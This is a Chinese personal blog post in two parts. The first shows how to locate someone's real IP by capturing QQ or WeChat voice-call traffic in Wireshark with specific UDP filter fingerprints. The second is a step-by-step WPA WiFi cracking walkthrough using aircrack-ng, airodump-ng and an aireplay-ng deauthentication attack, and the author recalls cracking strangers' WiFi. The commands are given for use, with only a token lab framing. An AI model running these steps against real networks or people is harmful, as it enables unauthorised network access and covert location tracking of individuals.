1、根据QQ(WX)语音(通话)定位ip

好久没去猪猪的网站学技术了,去看了两篇,复现了一下,首先是,(反制溯源?),关键内容是通过抓WX流量定位你的真实ip:

其中提到了根据Length、Time to live、Flags三个维度来来判断嫌疑人真实IP的技巧

这些关键指纹信息都可以使用wireshark抓流量包找到,那么第一步就是使用wireshark获取QQ(WX)语音的流量包。

关于wireshark的使用,网上教程非常多了,基本是网络学科朋友必备工具了,入门也比较简单。

实验开始,找到受害人lao zhang,发起语音通话,对方接不接通皆可,这时便可以抓到QQ语音的流量,但是是UDP包,所以需要通过特定的指纹去识别:

udp[8:3]==02:00:48

同理,WX为:

udp[8:1]==a3

网上帖子表示QQ的报文头是一直不会变化的,所以搜索改udp指纹是可行的,但是WX的报文头是随机的,通过规律只能发现到前两位是a3,所以使用此搜索方式。

莫不是一个新的溯源反制手段。。。

2、无线wifi破解

老活儿新整了属于是,怀念去年在百京躲1楼厕所里盲打无辜共享wifi的事。

无线wifi破解的文章网站也是一抓一大把,最多的文章基本都是搬的用aircrack-ng去破。虽然可行,但是就是要求你有好设备,好字典。

简单记一下破解流程,首先为了实验顺畅,受害人lao zhang(对又是lao zhang)提前告知了我他新设置的9位wifi密码,我提前记到了破解字典里。

首先准备一个无线网卡,建议是虚拟机免驱版,我这里直接插到kali里就能用了。

iwconfig   #系统配置无线网络设备或显示无线网络设备信息
airmon-ng start wlan0 #打开网卡监听模式
airodump-ng wlan0mon  #扫描附近的WiFi,感觉这步是无线网卡越好扫的越快越细呢。。
(airmon-ng check kill  #杀死进程)

#扫描到受害人的wifi后就可以等待被动连接或者主动使用handshake攻击使其重连,这样就抓到握手包了,之后便可以使用aircrack-ng爆破密码了

airodump-ng -c (ch信道号) –bssid (wifi的bssid) -w /home/kali(存储路径) wlan0mon
如果抓不到的话手动打一下:
aireplay-ng -0 10 -a (BSSID) -c (STATION) wlan0mon

抓到包后爆破:
aircrack-ng -w (字典路径) -b (BSSID) (抓到包的名称)

比较尴尬的就是爆破,你要没个好字典,怎么也爆不出来,生成一个9位纯数字字典都要10G。。。

没有截图,两篇纪录,仅做娱乐。


标题:根据QQ(WX)语音定位ip和无线wifi破解
作者:jyl
地址:http://jinyunlong.xyz/articles/2022/03/30/1648607951879.html